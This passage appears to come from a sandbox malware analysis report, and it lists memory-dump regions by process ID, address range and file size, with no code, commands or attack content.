                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/3968-292-0x0000000005200000-0x0000000005201000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/3968-133-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/3968-255-0x0000000000040000-0x0000000000041000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/3968-239-0x00000000779E0000-0x0000000077B6E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4216-193-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4252-413-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4276-217-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        12KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4276-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4340-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4396-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4472-384-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4552-466-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4596-374-0x0000000004B30000-0x0000000004C35000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4596-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4696-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4696-258-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        80KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4832-310-0x0000000004EC0000-0x00000000054C6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4832-273-0x000000000041A616-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4832-271-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4872-285-0x000000000041A76A-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4872-280-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        128KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-328-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-324-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-302-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-288-0x0000000003920000-0x000000000395C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        240KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-306-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-297-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-312-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-323-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-327-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-326-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-325-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-316-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-322-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-321-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-320-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-319-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-318-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-317-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-315-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-295-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/4888-263-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5132-462-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5160-422-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5240-503-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5304-505-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5432-511-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5436-521-0x000000000041A61A-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5584-442-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5620-517-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5696-476-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5720-444-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5760-484-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5776-480-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5828-446-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5840-482-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5896-486-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5928-447-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/5968-494-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/6004-502-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/6020-501-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/6036-491-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/6084-496-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • memory/6112-498-0x0000000000000000-mapping.dmp